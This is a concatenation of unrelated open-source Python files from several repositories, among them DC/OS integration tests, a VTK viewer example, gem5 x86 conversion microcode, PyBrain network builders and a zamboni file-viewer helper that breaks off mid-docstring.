Return the first suitable bank for the corresponding partner.
"""
payment_mode_obj = self.pool.get('payment.mode')
line2bank = {}
if not ids:
return {}
bank_type = payment_mode_obj.suitable_bank_types(cr, uid, payment_type,
context=context)
for line in self.browse(cr, uid, ids, context=context):
line2bank[line.id] = False
if line.invoice and line.invoice.partner_bank_id:
line2bank[line.id] = line.invoice.partner_bank_id.id
elif line.partner_id:
if not line.partner_id.bank_ids:
line2bank[line.id] = False
else:
for bank in line.partner_id.bank_ids:
if bank.state in bank_type:
line2bank[line.id] = bank.id
break
if not line2bank.get(line.id) and line.partner_id.bank_ids:
line2bank[line.id] = line.partner_id.bank_ids[0].id
else:
raise osv.except_osv(_('Error!'), _('There is no partner defined on the entry line.'))
return line2bank
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
surdy/dcos
|
refs/heads/master
|
packages/dcos-integration-test/extra/test_composition.py
|
1
|
import json
import logging
import os
import platform
import subprocess
import dns.exception
import dns.resolver
import kazoo.client
import pytest
import requests
from test_helpers import expanded_config
__maintainer__ = 'mnaboka'
__contact__ = 'dcos-cluster-ops@mesosphere.io'
@pytest.mark.first
@pytest.mark.supportedwindows
def test_dcos_cluster_is_up(dcos_api_session):
def _docker_info(component):
# sudo is required for non-coreOS installs
return subprocess.check_output(['sudo', 'docker', 'version', '-f', component]).decode('utf-8').rstrip()
cluster_environment = {
"docker_client_version": _docker_info('{{.Client.Version}}'),
"docker_server_version": _docker_info('{{.Server.Version}}'),
"system_platform": platform.platform(),
"system_platform_system": platform.system(),
"system_platform_release": platform.release(),
"system_platform_version": platform.version()
}
logging.info(json.dumps(cluster_environment, sort_keys=True, indent=4))
@pytest.mark.supportedwindows
def test_leader_election(dcos_api_session):
mesos_resolver = dns.resolver.Resolver()
mesos_resolver.nameservers = dcos_api_session.masters
mesos_resolver.port = 61053
try:
mesos_resolver.query('leader.mesos', 'A')
except dns.exception.DNSException:
assert False, "Cannot resolve leader.mesos"
@pytest.mark.supportedwindows
def test_if_all_mesos_masters_have_registered(dcos_api_session):
# Currently it is not possible to extract this information through Mesos'es
# API, let's query zookeeper directly.
zk_hostports = 'zk-1.zk:2181,zk-2.zk:2181,zk-3.zk:2181,zk-4.zk:2181,zk-5.zk:2181'
zk = kazoo.client.KazooClient(hosts=zk_hostports, read_only=True)
master_ips = []
zk.start()
for znode in zk.get_children("/mesos"):
if not znode.startswith("json.info_"):
continue
master = json.loads(zk.get("/mesos/" + znode)[0].decode('utf-8'))
master_ips.append(master['address']['ip'])
zk.stop()
assert sorted(master_ips) == dcos_api_session.masters
@pytest.mark.supportedwindows
def test_if_all_exhibitors_are_in_sync(dcos_api_session):
r = dcos_api_session.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
correct_data = sorted(r.json(), key=lambda k: k['hostname'])
for master_node_ip in dcos_api_session.masters:
# This relies on the fact that Admin Router always proxies the local
# Exhibitor.
resp = requests.get('http://{}/exhibitor/exhibitor/v1/cluster/status'.format(master_node_ip), verify=False)
assert resp.status_code == 200
tested_data = sorted(resp.json(), key=lambda k: k['hostname'])
assert correct_data == tested_data
def test_mesos_agent_role_assignment(dcos_api_session):
state_endpoint = '/state.json'
for agent in dcos_api_session.public_slaves:
r = dcos_api_session.get(state_endpoint, host=agent, port=5051)
assert r.json()['flags']['default_role'] == 'slave_public'
for agent in dcos_api_session.slaves:
r = dcos_api_session.get(state_endpoint, host=agent, port=5051)
assert r.json()['flags']['default_role'] == '*'
def test_systemd_units_are_healthy(dcos_api_session) -> None:
"""
Test that the system is healthy at the arbitrary point in time
that this test runs. This test has caught several issues in the past
as it serves as a very high-level assertion about the system state.
It seems very random, but it has proven very valuable.
We are explicit about the list of units that are expected to be present
in order to test against a static, known reference in order to avoid
dynamically generated output (e.g., from /health) not matching our
real world expectations and the test pass while errors occur silently.
First, we loop through the nodes returned from
the /system/health/v1/report endpoint and print the report if anything
is unhealthy.
Secondly, we check that the list of expected units matches the list
of units on every node.
"""
# Insert all the diagnostics data programmatically
master_units = [
'dcos-adminrouter.service',
'dcos-cosmos.service',
'dcos-exhibitor.service',
'dcos-history.service',
'dcos-log-master.service',
'dcos-log-master.socket',
'dcos-logrotate-master.service',
'dcos-logrotate-master.timer',
'dcos-marathon.service',
'dcos-mesos-dns.service',
'dcos-mesos-master.service',
'dcos-metronome.service',
'dcos-signal.service',
'dcos-oauth.service',
]
all_node_units = [
'dcos-checks-api.service',
'dcos-checks-api.socket',
'dcos-diagnostics.service',
'dcos-diagnostics.socket',
'dcos-gen-resolvconf.service',
'dcos-gen-resolvconf.timer',
'dcos-net.service',
'dcos-net-watchdog.service',
'dcos-pkgpanda-api.service',
'dcos-signal.timer',
'dcos-checks-poststart.service',
'dcos-checks-poststart.timer',
'dcos-telegraf.service',
'dcos-telegraf.socket']
slave_units = [
'dcos-mesos-slave.service']
public_slave_units = [
'dcos-mesos-slave-public.service']
all_slave_units = [
'dcos-docker-gc.service',
'dcos-docker-gc.timer',
'dcos-adminrouter-agent.service',
'dcos-log-agent.service',
'dcos-log-agent.socket',
'dcos-logrotate-agent.service',
'dcos-logrotate-agent.timer',
'dcos-rexray.service']
expected_units = {
"master": set(all_node_units + master_units),
"agent": set(all_node_units + all_slave_units + slave_units),
"agent_public": set(all_node_units + all_slave_units + public_slave_units),
}
# Collect the dcos-diagnostics output that `dcos-signal` uses to determine
# whether or not there are failed units.
resp = dcos_api_session.get('/system/health/v1/report?cache=0')
# We expect reading the health report to succeed.
resp.raise_for_status()
# Parse the response into JSON.
health_report = resp.json()
# The format of the /health/v1/report output is as follows:
# {
# "Nodes": { ... },
# "Units": {
# "dcos-unit-foo.service": {
# "UnitName": "dcos-unit-foo.service",
# "Nodes": [
# {
# "Role": "agent" (or "agent_public", or "master")
# "IP": "172.17.0.2",
# "Host": "dcos-e2e-7dd6638e-a6f5-4276-bf6b-c9a4d6066ea4-master-2",
# "Health": 0 if node is healthy, 1 if unhealthy,
# "Output": {
# "dcos-unit-bar.service": "" (empty string if healthy),
# "dcos-unit-foo.service": "journalctl output" (if unhealthy),
# }
# },
# ...
# ]
# }
# }
# }
# Test that all nodes have the correct set of dcos-* systemd units.
units_per_node = {}
exp_units_per_node = {}
for node, node_health in health_report["Nodes"].items():
role = node_health["Role"] # Is one of master, agent, agent_public
units_per_node[node] = set(node_health["Output"])
exp_units_per_node[node] = expected_units[role]
assert units_per_node == exp_units_per_node
# Test that there are no unhealthy nodes.
unhealthy_nodes = 0
for node, node_health in health_report["Nodes"].items():
# Assert that this node is healthy.
if node_health["Health"] != 0:
logging.info("Node {} was unhealthy: {}".format(
node, json.dumps(node_health, indent=4, sort_keys=True)))
unhealthy_nodes += 1
assert unhealthy_nodes == 0
def test_signal_service(dcos_api_session):
"""
signal-service runs on an hourly timer, this test runs it as a one-off
and pushes the results to the test_server app for easy retrieval
When this test fails due to `dcos-checks-poststart-service-unhealthy`,
consider that the issue may be due to check timeouts which are too low.
"""
# This is due to caching done by dcos-diagnostics / Signal service
# We're going to remove this soon: https://mesosphere.atlassian.net/browse/DCOS-9050
dcos_version = os.environ["DCOS_VERSION"]
with open('/opt/mesosphere/etc/dcos-signal-config.json', 'r') as f:
signal_config_data = json.load(f)
customer_key = signal_config_data.get('customer_key', '')
enabled = signal_config_data.get('enabled', 'false')
with open('/var/lib/dcos/cluster-id', 'r') as f:
cluster_id = f.read().strip()
if enabled == 'false':
pytest.skip('Telemetry disabled in /opt/mesosphere/etc/dcos-signal-config.json... skipping test')
logging.info("Version: " + dcos_version)
logging.info("Customer Key: " + customer_key)
logging.info("Cluster ID: " + cluster_id)
signal_results = subprocess.check_output(["/opt/mesosphere/bin/dcos-signal", "-test"], universal_newlines=True)
r_data = json.loads(signal_results)
resp = dcos_api_session.get('/system/health/v1/report?cache=0')
# We expect reading the health report to succeed.
resp.raise_for_status()
# Parse the response into JSON.
health_report = resp.json()
# Reformat the /health json into the expected output format for dcos-signal.
units_health = {}
for unit, unit_health in health_report["Units"].items():
unhealthy = 0
for node_health in unit_health["Nodes"]:
for output_unit, output in node_health["Output"].items():
if unit != output_unit:
# This is the output of some unrelated unit, ignore.
continue
if output == "":
# This unit is healthy on this node.
pass
else:
# This unit is unhealthy on this node.
unhealthy += 1
prefix = "health-unit-{}".format(unit.replace('.', '-'))
units_health.update({
"{}-total".format(prefix): len(unit_health["Nodes"]),
"{}-unhealthy".format(prefix): unhealthy,
})
exp_data = {
'diagnostics': {
'event': 'health',
'anonymousId': cluster_id,
'properties': units_health,
},
'cosmos': {
'event': 'package_list',
'anonymousId': cluster_id,
'properties': {}
},
'mesos': {
'event': 'mesos_track',
'anonymousId': cluster_id,
'properties': {}
}
}
# Generic properties which are the same between all tracks
generic_properties = {
'platform': expanded_config['platform'],
'provider': expanded_config['provider'],
'source': 'cluster',
'clusterId': cluster_id,
'customerKey': customer_key,
'environmentVersion': dcos_version,
'variant': 'open'
}
# Insert the generic property data which is the same between all signal tracks
exp_data['diagnostics']['properties'].update(generic_properties)
exp_data['cosmos']['properties'].update(generic_properties)
exp_data['mesos']['properties'].update(generic_properties)
# Check the entire hash of diagnostics data
if r_data['diagnostics'] != exp_data['diagnostics']:
# The optional second argument to `assert` is an error message that
# appears to get truncated in the output. As such, we log the output
# instead.
logging.error("Cluster is unhealthy: {}".format(
json.dumps(health_report, indent=4, sort_keys=True)))
assert r_data['diagnostics'] == exp_data['diagnostics']
# Check a subset of things regarding Mesos that we can logically check for
framework_names = [x['name'] for x in r_data['mesos']['properties']['frameworks']]
assert 'marathon' in framework_names
assert 'metronome' in framework_names
# There are no packages installed by default on the integration test, ensure the key exists
assert len(r_data['cosmos']['properties']['package_list']) == 0
|
JanOosting/ed-questionnaire
|
refs/heads/master
|
questionnaire/page/models.py
|
1
|
from django.db import models
from django.core.urlresolvers import reverse
class Page(models.Model):
slug = models.SlugField(unique=True, primary_key=True)
title = models.CharField(u"Title", max_length=256)
body = models.TextField(u"Body")
public = models.BooleanField(default=True)
def __unicode__(self):
return u"Page[%s]" % self.slug
def get_absolute_url(self):
return reverse('questionnaire.page.views.page', kwargs={'page_to_render':self.slug})
|
berendkleinhaneveld/VTK
|
refs/heads/master
|
Examples/GUI/Python/OrthogonalPlanesWithTkPhoto.py
|
9
|
import vtk
from vtk import *
import Tkinter
from Tkinter import *
import sys, os
import vtk.tk
import vtk.tk.vtkLoadPythonTkWidgets
import vtk.tk.vtkTkImageViewerWidget
from vtk.tk.vtkTkPhotoImage import *
from vtk.util.misc import *
class SampleViewer:
def __init__ ( self ):
self.Tk = Tk = Tkinter.Tk();
Tk.title ( 'Python Version of vtkImageDataToTkPhoto' );
# Image pipeline
reader = vtkVolume16Reader ()
reader.SetDataDimensions ( 64, 64 )
reader.SetDataByteOrderToLittleEndian ( )
reader.SetFilePrefix ( vtkGetDataRoot() + '/Data/headsq/quarter' )
reader.SetImageRange ( 1, 93 )
reader.SetDataSpacing ( 3.2, 3.2, 1.5 )
reader.Update ()
self.cast = cast = vtkImageCast()
cast.SetInputConnection( reader.GetOutputPort() )
cast.SetOutputScalarType ( reader.GetOutput().GetScalarType() )
cast.ClampOverflowOn()
# Make the image a little bigger
self.resample = resample = vtkImageResample ()
resample.SetInputConnection( cast.GetOutputPort() )
resample.SetAxisMagnificationFactor ( 0, 2 )
resample.SetAxisMagnificationFactor ( 1, 2 )
resample.SetAxisMagnificationFactor ( 2, 1 )
l,h = reader.GetOutput().GetScalarRange()
# Create the three orthogonal views
tphoto = self.tphoto = self.tphoto = vtkTkPhotoImage ();
cphoto = self.cphoto = vtkTkPhotoImage ();
sphoto = self.sphoto = vtkTkPhotoImage ();
reader.Update()
d = reader.GetOutput().GetDimensions()
self.Position = [ int(d[0]/2.0), int(d[0]/2.0), int(d[0]/2.0) ]
# Create a popup menu
v = IntVar()
self.popup = popup = Menu ( Tk, tearoff=0 )
popup.add_radiobutton ( label='unsigned char', command=self.CastToUnsignedChar, variable=v, value=-1 )
popup.add_radiobutton ( label='unsigned short', command=self.CastToUnsignedShort, variable=v, value=0 )
popup.add_radiobutton ( label='unsigned int', command=self.CastToFloat, variable=v, value=1 )
popup.add_radiobutton ( label='float', command=self.CastToFloat, variable=v, value=2 )
v.set ( 0 )
w = self.TransverseLabelWidget = Label ( Tk, image = tphoto )
w.grid ( row = 0, column = 0 )
w.bind ( "<Button1-Motion>", lambda e, i=tphoto, o='transverse', s=self: s.Motion ( e, i, o ) )
w.bind ( "<Button-3>", self.DoPopup )
w = Label ( Tk, image = cphoto )
w.grid ( row = 1, column = 0 )
w.bind ( "<Button1-Motion>", lambda e, i=cphoto, o='coronal', s=self: s.Motion ( e, i, o ) )
w.bind ( "<Button-3>", self.DoPopup )
w = Label ( Tk, image = sphoto )
w.grid ( row = 0, column = 1 )
w.bind ( "<Button1-Motion>", lambda e, i=sphoto, o='sagittal', s=self: s.Motion ( e, i, o ) )
w.bind ( "<Button-3>", self.DoPopup )
w = self.WindowWidget = Scale ( Tk, label='Window', orient='horizontal', from_=1, to=(h-l)/2, command = self.SetWindowLevel )
w = self.LevelWidget = Scale ( Tk, label='Level', orient='horizontal', from_=l, to=h, command=self.SetWindowLevel )
self.WindowWidget.grid ( row=2, columnspan=2, sticky='ew' )
self.LevelWidget.grid ( row=3, columnspan=2, sticky='ew' );
self.WindowWidget.set ( 1370 );
self.LevelWidget.set ( 1268 );
w = self.LabelWidget = Label ( Tk, bd=2, relief='raised' )
w.grid ( row=4, columnspan=2, sticky='ew' )
w.configure ( text = "Use the right mouse button to change data type" )
def DoPopup ( self, event ):
self.popup.post ( event.x_root, event.y_root )
def CastToUnsignedChar ( self ):
self.cast.SetOutputScalarTypeToUnsignedChar()
self.SetImages()
def CastToUnsignedShort ( self ):
self.cast.SetOutputScalarTypeToUnsignedShort()
self.SetImages()
def CastToUnsignedInt ( self ):
self.cast.SetOutputScalarTypeToUnsignedInt()
self.SetImages()
def CastToFloat ( self ):
self.cast.SetOutputScalarTypeToFloat()
self.SetImages()
def Motion ( self, event, image, orientation ):
w = image.width();
h = image.height()
if orientation == 'transverse':
self.Position[0] = event.x
self.Position[1] = h - event.y - 1
if orientation == 'coronal':
self.Position[0] = event.x;
self.Position[2] = event.y
if orientation == 'sagittal':
self.Position[1] = w - event.x - 1
self.Position[2] = event.y
self.LabelWidget.configure ( text = "Position: %d, %d, %d" % tuple ( self.Position ) )
self.SetImages()
def SetWindowLevel ( self, event ):
self.SetImages()
def SetImages ( self ):
Window = self.WindowWidget.get()
Level = self.LevelWidget.get()
image = self.resample.GetOutput()
self.tphoto.PutImageSlice ( self.resample.GetOutputPort(),
self.Position[2],
'transverse',
Window,
Level )
self.sphoto.PutImageSlice ( self.resample.GetOutputPort(),
self.Position[0],
'sagittal',
Window,
Level )
self.cphoto.PutImageSlice ( self.resample.GetOutputPort(),
self.Position[1],
'coronal',
Window,
Level )
if __name__ == '__main__':
S = SampleViewer()
S.Tk.mainloop()
|
powerjg/gem5-ci-test
|
refs/heads/master
|
src/arch/x86/isa/insts/simd128/floating_point/data_conversion/convert_floating_point_to_floating_point.py
|
90
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop CVTSS2SD_XMM_XMM {
cvtf2f xmml, xmmlm, destSize=8, srcSize=4, ext=Scalar
};
def macroop CVTSS2SD_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=Scalar
};
def macroop CVTSS2SD_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=Scalar
};
def macroop CVTSD2SS_XMM_XMM {
cvtf2f xmml, xmmlm, destSize=4, srcSize=8, ext=Scalar
};
def macroop CVTSD2SS_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=Scalar
};
def macroop CVTSD2SS_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=Scalar
};
def macroop CVTPS2PD_XMM_XMM {
cvtf2f xmmh, xmmlm, destSize=8, srcSize=4, ext=2
cvtf2f xmml, xmmlm, destSize=8, srcSize=4, ext=0
};
def macroop CVTPS2PD_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
cvtf2f xmmh, ufp1, destSize=8, srcSize=4, ext=2
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=0
};
def macroop CVTPS2PD_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
cvtf2f xmmh, ufp1, destSize=8, srcSize=4, ext=2
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=0
};
def macroop CVTPD2PS_XMM_XMM {
cvtf2f xmml, xmmlm, destSize=4, srcSize=8, ext=0
cvtf2f xmml, xmmhm, destSize=4, srcSize=8, ext=2
lfpimm xmmh, 0
};
def macroop CVTPD2PS_XMM_M {
ldfp ufp1, seg, sib, "DISPLACEMENT", dataSize=8
ldfp ufp2, seg, sib, "DISPLACEMENT + 8", dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=0
cvtf2f xmml, ufp2, destSize=4, srcSize=8, ext=2
lfpimm xmmh, 0
};
def macroop CVTPD2PS_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, "DISPLACEMENT", dataSize=8
ldfp ufp2, seg, riprel, "DISPLACEMENT + 8", dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=0
cvtf2f xmml, ufp2, destSize=4, srcSize=8, ext=2
lfpimm xmmh, 0
};
'''
|
pybrain2/pybrain2
|
refs/heads/master
|
pybrain/tools/shortcuts.py
|
25
|
__author__ = 'Tom Schaul and Thomas Rueckstiess'
from itertools import chain
import logging
from sys import exit as errorexit
from pybrain.structure.networks.feedforward import FeedForwardNetwork
from pybrain.structure.networks.recurrent import RecurrentNetwork
from pybrain.structure.modules import BiasUnit, SigmoidLayer, LinearLayer, LSTMLayer
from pybrain.structure.connections import FullConnection, IdentityConnection
try:
from arac.pybrainbridge import _RecurrentNetwork, _FeedForwardNetwork
except ImportError as e:
logging.info("No fast networks available: %s" % e)
class NetworkError(Exception): pass
def buildNetwork(*layers, **options):
"""Build arbitrarily deep networks.
`layers` should be a list or tuple of integers, that indicate how many
neurons the layers should have. `bias` and `outputbias` are flags to
indicate whether the network should have the corresponding biases; both
default to True.
To adjust the classes for the layers use the `hiddenclass` and `outclass`
parameters, which expect a subclass of :class:`NeuronLayer`.
If the `recurrent` flag is set, a :class:`RecurrentNetwork` will be created,
otherwise a :class:`FeedForwardNetwork`.
If the `fast` flag is set, faster arac networks will be used instead of the
pybrain implementations."""
# options
opt = {'bias': True,
'hiddenclass': SigmoidLayer,
'outclass': LinearLayer,
'outputbias': True,
'peepholes': False,
'recurrent': False,
'fast': False,
}
for key in options:
if key not in list(opt.keys()):
raise NetworkError('buildNetwork unknown option: %s' % key)
opt[key] = options[key]
if len(layers) < 2:
raise NetworkError('buildNetwork needs 2 arguments for input and output layers at least.')
# Bind the right class to the Network name
network_map = {
(False, False): FeedForwardNetwork,
(True, False): RecurrentNetwork,
}
try:
network_map[(False, True)] = _FeedForwardNetwork
network_map[(True, True)] = _RecurrentNetwork
except NameError:
if opt['fast']:
raise NetworkError("No fast networks available.")
if opt['hiddenclass'].sequential or opt['outclass'].sequential:
if not opt['recurrent']:
# CHECKME: a warning here?
opt['recurrent'] = True
Network = network_map[opt['recurrent'], opt['fast']]
n = Network()
# linear input layer
n.addInputModule(LinearLayer(layers[0], name='in'))
# output layer of type 'outclass'
n.addOutputModule(opt['outclass'](layers[-1], name='out'))
if opt['bias']:
# add bias module and connection to out module, if desired
n.addModule(BiasUnit(name='bias'))
if opt['outputbias']:
n.addConnection(FullConnection(n['bias'], n['out']))
# arbitrary number of hidden layers of type 'hiddenclass'
for i, num in enumerate(layers[1:-1]):
layername = 'hidden%i' % i
if issubclass(opt['hiddenclass'], LSTMLayer):
n.addModule(opt['hiddenclass'](num, peepholes=opt['peepholes'], name=layername))
else:
n.addModule(opt['hiddenclass'](num, name=layername))
if opt['bias']:
# also connect all the layers with the bias
n.addConnection(FullConnection(n['bias'], n[layername]))
# connections between hidden layers
for i in range(len(layers) - 3):
n.addConnection(FullConnection(n['hidden%i' % i], n['hidden%i' % (i + 1)]))
# other connections
if len(layers) == 2:
# flat network, connection from in to out
n.addConnection(FullConnection(n['in'], n['out']))
else:
# network with hidden layer(s), connections from in to first hidden and last hidden to out
n.addConnection(FullConnection(n['in'], n['hidden0']))
n.addConnection(FullConnection(n['hidden%i' % (len(layers) - 3)], n['out']))
# recurrent connections
if issubclass(opt['hiddenclass'], LSTMLayer):
if len(layers) > 3:
errorexit("LSTM networks with > 1 hidden layers are not supported!")
n.addRecurrentConnection(FullConnection(n['hidden0'], n['hidden0']))
n.sortModules()
return n
def _buildNetwork(*layers, **options):
"""This is a helper function to create different kinds of networks.
`layers` is a list of tuples. Each tuple can contain an arbitrary number of
layers, each being connected to the next one with IdentityConnections. Due
to this, all layers have to have the same dimension. We call these tuples
'parts.'
Afterwards, the last layer of one tuple is connected to the first layer of
the following tuple by a FullConnection.
If the keyword argument bias is given, BiasUnits are added additionally with
every FullConnection.
Example:
_buildNetwork(
(LinearLayer(3),),
(SigmoidLayer(4), GaussianLayer(4)),
(SigmoidLayer(3),),
)
"""
bias = options['bias'] if 'bias' in options else False
net = FeedForwardNetwork()
layerParts = iter(layers)
firstPart = iter(next(layerParts))
firstLayer = next(firstPart)
net.addInputModule(firstLayer)
prevLayer = firstLayer
for part in chain(firstPart, layerParts):
new_part = True
for layer in part:
net.addModule(layer)
# Pick class depending on whether we entered a new part
if new_part:
ConnectionClass = FullConnection
if bias:
biasUnit = BiasUnit('BiasUnit for %s' % layer.name)
net.addModule(biasUnit)
net.addConnection(FullConnection(biasUnit, layer))
else:
ConnectionClass = IdentityConnection
new_part = False
conn = ConnectionClass(prevLayer, layer)
net.addConnection(conn)
prevLayer = layer
net.addOutputModule(layer)
net.sortModules()
return net
|
ingenioustechie/zamboni
|
refs/heads/master
|
mkt/files/helpers.py
|
6
|
import codecs
import json
import mimetypes
import os
import time
from collections import OrderedDict
from django.conf import settings
from django.core.urlresolvers import reverse
from django.template.defaultfilters import filesizeformat
from django.utils.encoding import smart_unicode
import commonware.log
import jinja2
from cache_nuggets.lib import memoize, Message
from jingo import register
from django.utils.translation import ugettext as _
from appvalidator.testcases.packagelayout import (
blacklisted_extensions as blocked_extensions,
blacklisted_magic_numbers as blocked_magic_numbers)
import mkt
from mkt.files.utils import extract_zip, get_md5
from mkt.site.storage_utils import (copy_stored_file, local_storage,
private_storage, public_storage,
storage_is_remote, walk_storage)
from mkt.site.utils import env
# Allow files with a shebang through.
blocked_magic_numbers = [
b for b in list(blocked_magic_numbers) if b != (0x23, 0x21)]
blocked_extensions = [
b for b in list(blocked_extensions) if b != 'sh']
task_log = commonware.log.getLogger('z.task')
@register.function
def file_viewer_class(value, key):
result = []
if value['directory']:
result.append('directory closed')
else:
result.append('file')
if value['short'] == key:
result.append('selected')
if value.get('diff'):
result.append('diff')
return ' '.join(result)
@register.function
def file_tree(files, selected):
depth = 0
output = ['<ul class="root">']
t = env.get_template('fileviewer/node.html')
for k, v in files.items():
if v['depth'] > depth:
output.append('<ul class="js-hidden">')
elif v['depth'] < depth:
output.extend(['</ul>' for x in range(v['depth'], depth)])
output.append(t.render({'value': v, 'selected': selected}))
depth = v['depth']
output.extend(['</ul>' for x in range(depth, -1, -1)])
return jinja2.Markup('\n'.join(output))
class FileViewer(object):
"""
Provide access to a storage-managed file by copying it locally and
extracting info from it. `src` is a storage-managed path and `dest` is a
local temp path.
"""
def __init__(self, file_obj):
self.file = file_obj
self.addon = self.file.version.addon
self.src = (file_obj.guarded_file_path
if file_obj.status == mkt.STATUS_DISABLED
else file_obj.file_path)
self.dest = os.path.join(settings.TMP_PATH, 'file_viewer',
str(file_obj.pk))
self._files, self.selected = None, None
def __str__(self):
return str(self.file.id)
def _extraction_cache_key(self):
return ('%s:file-viewer:extraction-in-progress:%s' %
(settings.CACHE_PREFIX, self.file.id))
def extract(self):
"""
Will make all the directories and expand the files.
Raises error on nasty files.
"""
if self.file.status in mkt.LISTED_STATUSES:
storage = public_storage
else:
storage = private_storage
try:
tempdir = extract_zip(storage.open(self.src))
# Move extracted files into persistent storage.
for root, subdirs, files in os.walk(tempdir):
storage_root = root.replace(tempdir, self.dest, 1)
for fname in files:
file_src = os.path.join(root, fname)
file_dest = os.path.join(storage_root, fname)
copy_stored_file(file_src, file_dest,
src_storage=local_storage,
dst_storage=private_storage)
except Exception, err:
task_log.error('Error (%s) extracting %s' % (err, self.src))
raise
def cleanup(self):
try:
for root, dirs, files in walk_storage(
self.dest, storage=private_storage):
for fname in files:
private_storage.delete(os.path.join(root, fname))
except OSError as e:
if e.errno == 2:
# Directory doesn't exist, nothing to clean up.
return
raise
def is_extracted(self):
"""If the file has been extracted or not."""
return (private_storage.exists(
os.path.join(self.dest, 'manifest.webapp')) and
not Message(self._extraction_cache_key()).get())
def _is_binary(self, mimetype, path):
"""Uses the filename to see if the file can be shown in HTML or not."""
# Re-use the blocked data from amo-validator to spot binaries.
ext = os.path.splitext(path)[1][1:]
if ext in blocked_extensions:
return True
# S3 will return false for storage.exists() for directory paths, so
# os.path call is safe here.
if private_storage.exists(path) and not os.path.isdir(path):
with private_storage.open(path, 'r') as rfile:
bytes = tuple(map(ord, rfile.read(4)))
if any(bytes[:len(x)] == x for x in blocked_magic_numbers):
return True
if mimetype:
major, minor = mimetype.split('/')
if major == 'image':
return 'image' # Mark that the file is binary, but an image.
return False
def read_file(self, allow_empty=False):
"""
Reads the file. Imposes a file limit and tries to cope with
UTF-8 and UTF-16 files appropriately. Return file contents and
a list of error messages.
"""
try:
file_data = self._read_file(allow_empty)
# If this is a webapp manifest, we should try to pretty print it.
if (self.selected and
self.selected.get('filename') == 'manifest.webapp'):
file_data = self._process_manifest(file_data)
return file_data
except (IOError, OSError):
self.selected['msg'] = _('That file no longer exists.')
return ''
def _read_file(self, allow_empty=False):
if not self.selected and allow_empty:
return ''
assert self.selected, 'Please select a file'
if self.selected['size'] > settings.FILE_VIEWER_SIZE_LIMIT:
# L10n: {0} is the file size limit of the file viewer.
msg = _(u'File size is over the limit of {0}.').format(
filesizeformat(settings.FILE_VIEWER_SIZE_LIMIT))
self.selected['msg'] = msg
return ''
with private_storage.open(self.selected['full'], 'r') as opened:
cont = opened.read()
codec = 'utf-16' if cont.startswith(codecs.BOM_UTF16) else 'utf-8'
try:
return cont.decode(codec)
except UnicodeDecodeError:
cont = cont.decode(codec, 'ignore')
# L10n: {0} is the filename.
self.selected['msg'] = (
_('Problems decoding {0}.').format(codec))
return cont
def _process_manifest(self, data):
"""
This will format the manifest nicely for maximum diff-ability.
"""
try:
json_data = json.loads(data)
except Exception:
# If there are any JSON decode problems, just return the raw file.
return data
def format_dict(data):
def do_format(value):
if isinstance(value, dict):
return format_dict(value)
else:
return value
# We want everything sorted, but we always want these few nodes
# right at the top.
prefix_nodes = ['name', 'description', 'version']
prefix_nodes = [(k, data.pop(k)) for k in prefix_nodes if
k in data]
processed_nodes = [(k, do_format(v)) for k, v in data.items()]
return OrderedDict(prefix_nodes + sorted(processed_nodes))
return json.dumps(format_dict(json_data), indent=2)
def select(self, file_):
self.selected = self.get_files().get(file_)
def is_binary(self):
if self.selected:
binary = self.selected['binary']
if binary and binary != 'image':
self.selected['msg'] = _('This file is not viewable online. '
'Please download the file to view '
'the contents.')
return binary
def is_directory(self):
if self.selected:
if self.selected['directory']:
self.selected['msg'] = _('This file is a directory.')
return self.selected['directory']
def get_default(self, key=None):
"""Gets the default file and copes with search engines."""
if key:
return key
return 'manifest.webapp'
def get_files(self):
"""
Returns an OrderedDict, ordered by the filename of all the files in the
